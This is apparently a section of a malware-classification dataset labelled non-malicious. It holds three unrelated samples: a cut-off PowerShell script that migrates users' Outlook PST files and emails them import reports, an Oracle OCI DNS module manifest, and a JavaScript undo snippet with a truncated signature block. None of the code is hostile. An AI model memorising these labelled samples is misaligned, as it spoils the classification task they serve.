$Continue = $true
Write-Host $("$SamAcct; Connect to $IP passed")
$("$SamAcct; LocalBU is $LocalBU") >> $Script:MoveFileLog
} Elseif (Test-Path $('\\\\' + $IP + '\\c$\\documents and settings\\' + $SamAcct)) {
# Put them in this dir structure, create or use Outlook Files dir
$LocalBU = $('\\\\' + $IP + '\\c$\\documents and settings\\' + $SamAcct + '\\Outlook Files')
if (!(Test-Path $LocalBU)){ mkdir $LocalBU }
$Continue = $true
Write-Host $("$SamAcct; LocalBU is $LocalBU")
$("$SamAcct; LocalBU is $LocalBU") >> $Script:MoveFileLog
} Else {
# crap! i give up...
#I hope i have the right IP -- log it
Write-Host "Can not find a secure directory for $SamAcct"
$Continue = $false
$("$SamAcct; LocalBU is Can not find a secure directory; Fail") >> $Script:MoveFileLog
}
if ($Continue) {
# move the files
$FileNames = @()
$PSTFiles | %{
$ThisPST = $_
$FN = $ThisPST.Name
$PSTBackups = $LocalBU
$FileAge = (((get-date) - ($ThisPST.LastWriteTime)).Days)
Write-Host "Working: $FN"
Write-Host "(($AvailableSpace) -gt ($PSTSize))"
Write-Host "IgnoreAge is $IgnoreAge"
if($AvailableSpace -gt $PSTSize) {
# there is enough space on the drive to hanlde all the PSTs
If($IgnoreAge) {
# if we are moving a lot of files, many can be named the same, as in backups and crap like that
# so allow by adding a random number to the filename
if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){
#rename it in the move
$rn = "{0:00}" -f (Get-Random -maximum 10000)
[string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1])
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
} Else {
# Just Move It Move It
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
}
} Else {
#don't move if younger than 30 days
If ($ThisPST.LastWriteTime -le (get-date ((get-date).adddays(-30)))){
#meaning it's older, so move it
# if we are moving a lot of files, many can be named the same, as in backups and crap like that
# so allow by adding a random number to the filename
if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){
#rename it in the move
$rn = "{0:00}" -f (Get-Random -maximum 10000)
[string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1])
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
} Else {
# Just Move It Move It
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct;Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
}
} Else {
# file is too young
$("$SamAcct; Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
}
}
} Else {
# there is NOT enough space on the drive to handle all the PSTs
# Psts are sorted by smallest to largest so do what you can
$AvailableSpace = [int](get-freediskspace 'c:' $IP)/2
$PSTSize = (($ThisPST | Measure-Object Length -sum).Sum)/(1024*1024)
If($AvailableSpace -gt $PSTSize) {
Write-Host "(($AvailableSpace) -gt ($PSTSize))"
If($IgnoreAge) {
# if we are moving a lot of files, many can be named the same, as in backups and crap like that
# so allow by adding a random number to the filename
if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){
#rename it in the move
$rn = "{0:00}" -f (Get-Random -maximum 10000)
[string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1])
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
} Else {
# Just Move It Move It
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
}
} Else {
#don't move if younger than 90 days
If ($ThisPST.LastWriteTime -le (get-date ((get-date).adddays(-30)))){
#meaning it's older, so move it
# if we are moving a lot of files, many can be named the same, as in backups and crap like that
# so allow by adding a random number to the filename
if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){
#rename it in the move
$rn = "{0:00}" -f (Get-Random -maximum 10000)
[string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1])
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
} Else {
# Just Move It Move It
$PSTBackups = $PSTBackups + "\\" + $FN
$("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)"
#Read-Host "Continue"
Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)
}
} Else {
# file is too young
$("$SamAcct; Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
}
}
} Else {
$("$SamAcct; Age [$($FileAge)] Skipping due to AvailableSpace $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog
}
}
$FileNames += $FN
}
} Else {
Write-Host "No Files Moved."
$("$SamAcct; No Files Moved.") >> $Script:MoveFileLog
}
} Else {
Write-Host "Computer [$IP] seems dead"
$("$SamAcct; Computer [$IP] seems dead.") >> $Script:MoveFileLog
}
} Else {
if (!($PSTFiles)) {
Write-Host "No PST Files found."
$("$SamAcct; No PST Files found.") >> $Script:MoveFileLog
} Else {
Write-Host "Bad Parameters or Not CONUS User."
$("$SamAcct; Bad Parameters or Not CONUS User.") >> $Script:MoveFileLog
}
}
}
#=============================================================================
# PST Queue Functions
#=============================================================================
Function Format-JobStatus($JobObj) {
<#
.SYNOPSIS
Query the queue for info on a particular user.
.DESCRIPTION
Query the queue for info on a particular user.
Count the number of jobs in each status category, incoming JobObj is a
collection.
#>
#
#
#
#
$JobsCount = 0
$StatusNew = 0
$StatusCopied = 0
$StatusBITS = 0
$StatusInQueue = 0
$StatusImported = 0
$StatusCleanedup = 0
$StatusNotified = 0
$LastError = $null
$JobSize = 0
$StatusSkipped = 0
$JobObj | %{
$ClientOK = $_.ClientVerOK
$UName = $_.UserMBX
$TargetDB = $_.TargetDB
$a = [int]($_.FileSize)
$JobSize += $a
$skip=$false
if(($_.ProcessFile -eq "FALSE")){$Skip=$true}
Switch ($_.JobStatus) {
New {
if(($Skip)){$StatusSkipped++} Else {$StatusNew++}
}
NewBits {
if(($Skip)){$StatusSkipped++} Else {$StatusNew++}
}
Copied {$StatusCopied++}
InBits {$StatusBITS++}
InQueue {$StatusInQueue++}
Imported {$StatusImported++}
CleanedUp {$StatusCleanedup++}
Notified {$StatusNotified++}
}
$JobsCount++
}
$StatusEntry = New-Object PSObject
$StatusEntry | Add-Member -type NoteProperty -name Name -value ($UName)
$StatusEntry | Add-Member -type NoteProperty -name Client -value ($ClientOK)
$StatusEntry | Add-Member -type NoteProperty -name Size -value ($JobSize)
$StatusEntry | Add-Member -type NoteProperty -name Jobs -value ($JobsCount)
$StatusEntry | Add-Member -type NoteProperty -name New -value ($StatusNew)
$StatusEntry | Add-Member -type NoteProperty -name Skip -value ($StatusSkipped)
$StatusEntry | Add-Member -type NoteProperty -name BITS -value ($StatusBITS)
$StatusEntry | Add-Member -type NoteProperty -name Copied -value ($StatusCopied)
$StatusEntry | Add-Member -type NoteProperty -name InQue -value ($StatusInQueue)
$StatusEntry | Add-Member -type NoteProperty -name Imptd -value ($StatusImported)
$StatusEntry | Add-Member -type NoteProperty -name ClndUp -value ($StatusCleanedup)
$StatusEntry | Add-Member -type NoteProperty -name Notifd -value ($StatusNotified)
$StatusEntry | Add-Member -type NoteProperty -name Target -value ($TargetDB)
#$StatusEntry | Add-Member -type NoteProperty -name Errors -value ($LastError)
$StatusEntry
}
Function Get-ArchDB() {
<#
.SYNOPSIS
Find the smallest Archive mailbox database
.DESCRIPTION
Find the smallest Archive mailbox database, not necesarily the smallest now,
but even after all the current jobs are processed
#>
#get current sizes - include or exclude certain DBs
$ArchSize = @{}
# get all database that Start with "arch", 3 digits, and end with character "b-z" like "Arch101B" for example
# excluding arch102* for now, no more users there...
(get-mailboxdatabase |?{$_.name -match 'arch\\d{3}[acdef]' -and $_.name -notmatch 'arch102'} | Get-MailboxDatabase -Status) | %{$ArchSize.Add($_.Name, $_.DatabaseSize.ToMB())}
# need to account for pending items...
if($OldJobQueue) {
$OldJobQueue | %{
$tmp = $ArchSize.item($_.TargetDB)
$Tmp += [int]$_.FileSize
$ArchSize.remove($_.TargetDB)
$ArchSize.add($_.TargetDB, $tmp)
}
}
# return the smallest one
($ArchSize.GetEnumerator() | sort Value)[0].Name
}
Function Lock-PSTIQ() {
<#
.SYNOPSIS
Signal the queue file is in use by creating a file.
.DESCRIPTION
Signal the queue file is in use by creating a file.
#>
if(!(Test-PSTIQLock)) {$a = New-Item $($Script:PSTUNCDir + '\\PSTImportQueue.Lock') -itemtype "file"}
}
Function New-TargetPSTDirectory($MBX = $null) {
<#
.SYNOPSIS
Create a directory to hold the PST file while they are importing.
.DESCRIPTION
Create a directory to hold the PST file while they are importing.
These psts are deleted at the end, but reports for each PST file
are left in the directory.
#>
$Return = "Error"
If ($MBX) {
$dir = $Script:PSTShareDir + "\\" + $MBX.samaccountname
if(!(Test-Path $dir)) {
$newdir = ni -ItemType Directory -Path $dir
} Else {
$Return = $dir
}
}
#Test new dir and make sure it's there
If($newdir) {
$Return = (resolve-path $newdir).ProviderPath
}
$Return
}
Function Test-PSTIQLock () {
<#
.SYNOPSIS
Test to see if PST Import Queue is in use.
.DESCRIPTION
Test to see if PST Import Queue is in use.
#>
Test-Path $($Script:PSTUNCDir + '\\PSTImportQueue.Lock')
}
Function Unlock-PSTIQ() {
<#
.SYNOPSIS
Remove the lock when the PST Import Queue is no longer in use.
.DESCRIPTION
Remove the lock when the PST Import Queue is no longer in use.
#>
if(Test-PSTIQLock) {Remove-Item $($Script:PSTUNCDir + '\\PSTImportQueue.Lock')}
}
#=============================================================================
# Send Notification Functions
#=============================================================================
Function Send-NotificationInitialReport($JobObj) {
<#
.SYNOPSIS
Send the User a notification of PST files found and the work to be done.
.DESCRIPTION
Send the User a notification of PST files found and the work to be done.
Incoming JobObj will give us the information we needed to the report.
#>
$AllProcessFiles = $JobObj | ?{$_.ProcessFile -eq $true}
$AllSkippedJobs = $JobObj | ?{$_.ProcessFile -ne $true}
$JobObj | %{$User = $_.UserMBX; $CLOK = $_.ClientVerOK }
Write-Host $User
Write-Host $CLOK
$Subject = "Requested PST Import: Initial Report for " + $User
$From = "EmailTeam@domain.com"
$Body = "Note: This process will not delete or alter your original PSTs in any way.`n"
if ($JobObj.ClientVer -match "^14.") {
$Body = $Body + "Your offline PST files will be copied into your new " + '"Archive - ' + $JogObj.UserEmail + '"' + " folder in Outlook.`n"
} Else {
$Body = $Body + "Your offline PST files will be copied into your new " + '"Online PST"' + " folder in Outlook.`n"
}
$Body = $Body + "`n"
$Body = $Body + "The copy may take a few nights to complete. The process will start tonight about 7PM (1900). `n"
$Body = $Body + "`t- Do not add any messages to your PSTs during this process.`n"
$Body = $Body + "`t- Please shut down Outlook before leaving each night.`n"
$Body = $Body + "`t- You do not need to turn off your PC.`n"
$Body = $Body + "`n"
$Body = $Body + "You will be notified when the copies are complete.`n"
$Body = $Body + "`n"
# you may want to comment this out, or create one of your own
#$Body = $Body + "Click below to read the FAQ about Online PSTs."
#$Body = $Body + "`n"
#$Body = $Body + '"' + 'http://<link to self help doc on sharepoint>
#$Body = $Body + "`n"
$Body = $Body + "Once you see your new Online PST, use it as you would any PST.`n"
$Body = $Body + "`n"
$Body = $Body + "The procedure for finding your PST files has finished and found " + $JobObj.Count + " files. The ones scheduled for import, are:`n`n"
#location of How to remove password on PST
#"`n(http://office.microsoft.com/en-us/outlook-help/remove-a-password-from-a-personal-folders-file-pst-HA001151725.aspx)"
if ($AllProcessFiles) {
$NUm = 0
$tmp = $null
$tmp = "{0,3}`t{1,-25}`t{2}`t`t{3}`n" -f ("Num"),("FileName"),("Size"),("Directory")
$Body = $Body + $tmp
$AllProcessFiles | %{
$NUm++
$To = $_.UserEmail
$temp = '"' + (split-path $_.OrgUNCName) + '"'
$temp1 = $_.OrgFileName
$tempS = $_.FileSize
$tmp = $null
$tmp = "{0,3}`t{1,-25}`t({2,7} M)`t{3}`n" -f ($Num),($temp1),($tempS), ($temp)
$Body = $Body + $tmp
}
} Else {
$Body = $Body + "(None)"
}
$Body = $Body + "`n`nSkipped Files: `n"
if($AllSkippedJobs) {
$NUm = 0
$tmp = $null
$tmp = "{0,3}`t{1,6}`t{2,-25}`t{3}`t`t{4}`n" -f ("Num"),("Reason"),("FileName"),("Size"),("Directory")
$Body = $Body + $tmp
$AllSkippedJobs | %{
$NUm++
$To = $_.UserEmail
$temp = '"' + (split-path $_.OrgUNCName) + '"'
$temp1 = $_.OrgFileName
$tempS = $_.FileSize
$skip = $_.SkipReason
$tmp = $null
$tmp = "{0,3}`t{1,6}`t{2,-25}`t({3,7} M)`t{4}`n" -f ($Num),($skip),($temp1),($tempS),($temp)
$Body = $Body + $tmp
}
} Else {
$Body = $Body + "(None)"
}
$Body = $Body + "`n`n"
$Body = $Body + "Files are skipped due to either size (empty file) or not opened by Outlook in the last 2 years.`n"
$Body = $Body + "Files also can be skipped if they look like Backups (BU) or Sharepoint Lists (SP).`n"
$Body = $Body + "(Skipping files is just a suggestion. You can opt to include them.)`n"
if($JobObj.Count){
$Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj)[0].ClientVerOK) + " " + (($JobObj)[0].ClientVer) + "]["+(($JobObj)[0].IP)+"]["+(($JobObj)[0].OSName)+"]"
} Else {
$Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj).ClientVerOK) + " " + (($JobObj).ClientVer) + "]["+(($JobObj).IP)+"]["+(($JobObj).OSName)+"]"
}
If ($NoNotify) {
Send-MailMessage -Body $body -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -To $Script:AdminEmail
} Else {
Send-MailMessage -Body $body -To $To -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -cc $Script:AdminEmail
#Send-MailMessage -Body $body -To $JobObj.UserEmail -From $From -SmtpServer $Script:SMTPServer -Subject $Subject
}
}
Function Send-NotificationFinalReport($JobObj) {
<#
.SYNOPSIS
Send User the Final report detailing the work done.
.DESCRIPTION
Send User the Final report detailing the work done.
#>
$AllProcessFiles = $JobObj | ?{$_.ProcessFile -eq "TRUE"}
$AllSkippedJobs = $JobObj | ?{$_.ProcessFile -eq "FALSE"}
if($JobObj.Count) {
$Subject = "Requested PST Import: Final Results for: " + $JobObj[0].UserMBX
$ClientVer = $JobObj[0].ClientVer
$Email = $($JobObj[0].UserEmail.ToString())
} Else {
$Subject = "Requested PST Import: Final Results for: " + $JobObj.UserMBX
$ClientVer = $JobObj.ClientVer
$Email = $($JobObj.UserEmail.ToString())
}
$From = "EmailTeam@domain.com"
$Body = "The process for copying your PST files has finished. Please take a few moments to complete the final steps:`n"
$Body = $Body + "`n"
if ($ClientVer -match "^14." -or $ClientVer -match "Ignore") {
$Body = $Body + "`t1. Review messages in the " + '"Archive - ' + $Email + '"' + " folder in Outlook and confirm all have been copied correctly.`n"
} Else {
$Body = $Body + "`t1. Review messages in the " + '"Online PST"' + " folder in Outlook and confirm all have been copied correctly.`n"
}
#$Body = $Body + "`t1. Review messages in the " + '"Online PST - <yourname>" or "Archive - <yourname>"' + " folder in Outlook and confirm all have been copied correctly.`n"
$Body = $Body + "`t2. Disconnect the old PSTs from Outlook. (right click the name and choose: Close <pstname>)`n"
$Body = $Body + "`t3. Restart Outlook - to release the lock on the file.`n"
$Body = $Body + "`t4. Move the old PST files from your Home Drive (H:\\) to a local drive. This will improve your Outlook performance!`n"
$Body = $Body + "`t (For example, create a directory in " + '"My Documents"' + " called " + '"Outlook Files"' + " and move the files listed below from your H:\\ to the new Outlook Files directory.)`n"
if ($ClientVer -match "^14." -or $ClientVer -match "Ignore") {
$Body = $Body + "`t5. Begin storing messages in your " + '"Archive - ' + $Email + '"' + " folder instead of your old PSTs.`n"
} Else {
$Body = $Body + "`t5. Begin storing messages in your " + '"Online PST"' + " folder instead of your old PSTs.`n"
}
#$Body = $Body + "`n`tFor detailed instructions, click this link:`n"
#$Body = $Body + "`n`t" + '"http://<sharepointsite>/Self-Help/Standard Application Issues/How do I Disconnect My Personal Folders.pdf"' + "`n"
#$Body = $Body + "`n"
$Body = $Body + "`tNote: Remember you can read your old PSTs at any time. In a few days you will not be able to add any new emails to these old PST files.`n"
$Body = $Body + "`t You are now using the Online PST instead.`n"
$Body = $Body + "`n"
$Body = $Body + "`nThe files which can be moved off your home drive:`n"
$Body = $Body + "`n"
$Body = $Body + "`nIf you need assistance or have any questions, simply reply-all to this email.`n"
$Body = $Body + "`n"
$Body = $Body + "Imported Files:`n"
$NUm = 0
$tmp = "{0,3}`t{1,-40}`t{2,-35}`t{3}`t{4}`n" -f ("Num"),("FileName"),("Target Folder"),("Size"),("Directory")
$Body = $Body + $tmp
$AllProcessFiles | %{
$NUm++
$To = $_.UserEmail
$temp = '"' + (split-path $_.OrgUNCName) + '"'
$temp1 = $_.OrgFileName
$tempS = $_.FileSize
$tempT = $_.TargetRootFolder
$tmp = $null
$tmp = "{0,3}`t{1,-40}`t{2,-35}`t({3,7} M)`t{4}`n" -f ($Num),($temp1),($tempT),($tempS),($temp)
$Body = $Body + $tmp
}
$Body = $Body + "`n`nSkipped Files:`n"
if($AllSkippedJobs) {
$NUm = 0
$tmp = $null
$tmp = "{0,3}`t{1,6}`t{2,-40}`t{3}`t`t{4}`n" -f ("Num"),("Reason"),("FileName"),("Size"),("Directory")
$Body = $Body + $tmp
$AllSkippedJobs | %{
$NUm++
$To = $_.UserEmail
$temp = '"' + (split-path $_.OrgUNCName) + '"'
$temp1 = $_.OrgFileName
$tempS = $_.FileSize
$skip = $_.SkipReason
$tmp = $null
$tmp = "{0,3}`t{1,6}`t{2,-40}`t({3,7} M)`t{4}`n" -f ($Num),($skip),($temp1),($tempS),($temp)
$Body = $Body + $tmp
}
} Else {
$Body = $Body + "(None) "
}
#$Body = $Body + "`n`nIf you have any questions, reply to this email."
$Body = $Body + "`n"
$Body = $Body + "`Thank You -- The Email Group"
$Body = $Body + "`n"
if($JobObj.Count){
$Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj)[0].ClientVerOK) + " " + (($JobObj)[0].ClientVer) + "]["+(($JobObj)[0].IP)+"]["+(($JobObj)[0].OSName)+"]"
} Else {
$Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj).ClientVerOK) + " " + (($JobObj).ClientVer) + "]["+(($JobObj).IP)+"]["+(($JobObj).OSName)+"]"
}
Send-MailMessage -Body $body -To $To -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -Cc $Script:AdminEmail
}
Function Send-NotificationPSTRemoval() {
<#
.SYNOPSIS
Send user a report showing the files that are still 'connected' to Outlook
.DESCRIPTION
Send user a report showing the files that are still 'connected' to Outlook
Connected means the LastWriteTime was within the last 24 hours.
User gets this email every 14 days as a reminder to disconnect their Old
PST files and optionaly remove those PST files from Home Share.
#>
#------------------------------------------------------------------------
Param(
$ArchObj,
[array]$PSTFilesInUse,
[array]$PSTFilesALL,
[array]$PSTFilesMovable
)
$Subject = "Online PST -- Possible Outlook Issue : " + $ArchObj.DisplayName + " (" + $ArchObj.DaysSinceImport + ")"
$From = "EmailTeam@domain.com"
$To = $((get-mailbox $ArchObj.DisplayName).PrimarySMTPAddress.ToString())
$CC = $Script:AdminEmail
[int]$InUse = cc $PSTFilesInUse; Write-Verbose "[SendNotification] Inuse - $InUse"
[int]$AllPSTs = cc $PSTFilesALL; Write-Verbose "[SendNotification] AllPST - $AllPSTs"
[int]$Movable = cc $PSTFilesMovable; Write-Verbose "[SendNotification] AllPST - $AllPSTs"
#grab this user's latest client version
$Vers = (import-csv $Script:PSTCompleteFile | ?{$_.UserMBX -match ($ArchObj.DisplayName)} | sort LastCheckTime -Descending)
If ($Vers.Count) {
$ClientVer = $Vers[0].ClientVer
} Else {
If ($Vers){
$ClientVer = $Vers.ClientVer
} Else {
$ClientVer = "Ignore"
}
}
Write-Verbose "[SendNotification] $(($ArchObj).DisplayName) : Client Ver is $($ClientVer)"
If ($ClientVer -match "^14." -or $ClientVer -match "Ignore") {
$Archive =
|
combined_dataset/train/non-malicious/sample_40_31.ps1
|
sample_40_31.ps1
|
#
# Module manifest for module 'OCI.PSModules.Dns'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Dns.dll'
# Version number of this module.
ModuleVersion = '74.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'd69f0172-1c3b-4e1b-97f5-d455d0244e12'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Dns Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '74.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dns.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIDnsDomainRecords', 'Get-OCIDnsResolver',
'Get-OCIDnsResolverEndpoint', 'Get-OCIDnsResolverEndpointsList',
'Get-OCIDnsResolversList', 'Get-OCIDnsRRSet',
'Get-OCIDnsSteeringPoliciesList', 'Get-OCIDnsSteeringPolicy',
'Get-OCIDnsSteeringPolicyAttachment',
'Get-OCIDnsSteeringPolicyAttachmentsList', 'Get-OCIDnsTsigKey',
'Get-OCIDnsTsigKeysList', 'Get-OCIDnsView', 'Get-OCIDnsViewsList',
'Get-OCIDnsZone', 'Get-OCIDnsZoneContent', 'Get-OCIDnsZoneRecords',
'Get-OCIDnsZonesList', 'Get-OCIDnsZoneTransferServersList',
'Invoke-OCIDnsPatchDomainRecords', 'Invoke-OCIDnsPatchRRSet',
'Invoke-OCIDnsPatchZoneRecords', 'Move-OCIDnsResolverCompartment',
'Move-OCIDnsSteeringPolicyCompartment',
'Move-OCIDnsTsigKeyCompartment', 'Move-OCIDnsViewCompartment',
'Move-OCIDnsZoneCompartment', 'New-OCIDnsResolverEndpoint',
'New-OCIDnsSteeringPolicy', 'New-OCIDnsSteeringPolicyAttachment',
'New-OCIDnsTsigKey', 'New-OCIDnsView', 'New-OCIDnsZone',
'New-OCIDnsZoneFromZoneFile', 'Remove-OCIDnsDomainRecords',
'Remove-OCIDnsResolverEndpoint', 'Remove-OCIDnsRRSet',
'Remove-OCIDnsSteeringPolicy',
'Remove-OCIDnsSteeringPolicyAttachment', 'Remove-OCIDnsTsigKey',
'Remove-OCIDnsView', 'Remove-OCIDnsZone',
'Update-OCIDnsDomainRecords', 'Update-OCIDnsResolver',
'Update-OCIDnsResolverEndpoint', 'Update-OCIDnsRRSet',
'Update-OCIDnsSteeringPolicy',
'Update-OCIDnsSteeringPolicyAttachment', 'Update-OCIDnsTsigKey',
'Update-OCIDnsView', 'Update-OCIDnsZone', 'Update-OCIDnsZoneRecords'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dns'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_15_43.ps1
|
sample_15_43.ps1
|
function setName(element, newValue) {
this._element = element;
this._oldValue = this._element.name;
this._newValue = newValue;
onDo();
}
function getName() {
return "element renamed";
}
function onDo() {
this._element.name = this._newValue;
document.elementModified(this._element.id);
}
function onUndo() {
this._element.name = this._oldValue;
document.elementModified(this._element.id);
}
// SIG // Begin signature block
// SIG // MIInywYJKoZIhvcNAQcCoIInvDCCJ7gCAQExDzANBglg
// SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor
// SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC
// SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg
// SIG // 48fq92Z+YtzSPkq/5WJl23G+1Nuhbzno+GznvlR8DYyg
// SIG // gg2FMIIGAzCCA+ugAwIBAgITMwAAA64tNVHIU49VHQAA
// SIG // AAADrjANBgkqhkiG9w0BAQsFADB+MQswCQYDVQQGEwJV
// SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
// SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
// SIG // cmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBT
// SIG // aWduaW5nIFBDQSAyMDExMB4XDTIzMTExNjE5MDg1OVoX
// SIG // DTI0MTExNDE5MDg1OVowdDELMAkGA1UEBhMCVVMxEzAR
// SIG // BgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
